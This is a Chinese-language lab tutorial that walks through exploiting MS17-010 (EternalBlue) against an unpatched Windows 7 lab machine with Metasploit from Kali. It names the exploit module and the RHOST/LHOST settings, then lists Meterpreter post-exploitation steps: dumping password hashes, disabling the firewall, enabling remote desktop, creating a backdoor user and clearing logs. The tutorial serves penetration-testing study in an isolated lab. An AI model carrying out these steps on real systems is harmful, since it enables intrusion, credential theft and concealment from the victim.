kail利⽤msf⼯具对ms17-010(永恒之蓝)漏洞⼊侵渗透Win7 kail利⽤msf⼯具对ms17-010(永恒之蓝)漏洞⼊侵渗透Win7 前⾔:
提到操作系统漏洞,⼤家肯定听说过⽿熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry病毒的诞⽣。 该病毒是不法分⼦利⽤NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进⾏传播 。病毒肆虐,俨然是⼀场全球性互联⽹灾难,给⼴⼤电脑⽤户造成了巨⼤损失。最新统计数据显⽰,100多个国家和地区超过10万台电脑遭到了病毒攻击、感染。 病毒是⾃熊猫烧⾹以来影响⼒最⼤的病毒之⼀。 实验环境:
⼯具:metasploit
靶机两台:windows 7sp1和kali2020
攻击机IP地址:192.168.29.131
被攻击机IP地址:192.168.29.128
实验条件:两台机⼦可以互通的,并且windows 7sp1(⽆补丁)开启了445端⼝,防⽕墙是关闭的。
步骤:
1、在kali⾥⾯打开metasploit漏洞利⽤框架
2、搜索ms17-010漏洞利⽤模块 search 17-010
到exploit/windows/smb/ms17_010_eternalblue
其中exploit具有攻击性,auxliary是⽤来验证的。
3、使⽤利⽤模块use+exploit/windows/smb/ms17_010_eternalblue
4、查看配置项 show options
5、设置 靶机IP地址(RHOST),攻击机IP地址(LHOST)
再次查看配置项
6、实施攻击exploit/run
7、攻⼊⽬标主机
Meterpreter 是 Metasploit 的⼀个扩展模块,可以调⽤ Metasploit 的⼀些功能,对⽬标系统进⾏更深⼊的渗透,如获取屏幕、上传/下载⽂件、创建持久后门等。
在攻击进去的情况下演⽰⼏个功能
1、查看⽬标主机的操作系统信息(sysinfo)
2、对⽬标主机的屏幕进⾏截图(截图保存在/root下)
3、查看⽬标主机所有的⽤户名和密码(密码显⽰为hash值)
4、获取shell页⾯
乱码解决⽅法:
输⼊chcp 65001可将乱码解决
5、关闭防⽕墙
msinfo
6、关闭Telnet服务
7、⽤两种⽅法开启远程桌⾯服务,并查看远程桌⾯功能启⽤情况(1)⽅法1:run getgui -e (2)⽅法2:run post/windows/manage/enable_rdp
到windows7sp1上查看远程桌⾯功能启⽤情况
8、创建系统⽤户(创建⽤户名为:test,密码为:123456)
9、清除⽇志
使⽤VNC payload远程操控⽬标电脑
1,输⼊Background,返回退出meterpreter界⾯
2,查看set payload 参数(输⼊set payload 按两下 TAB键 )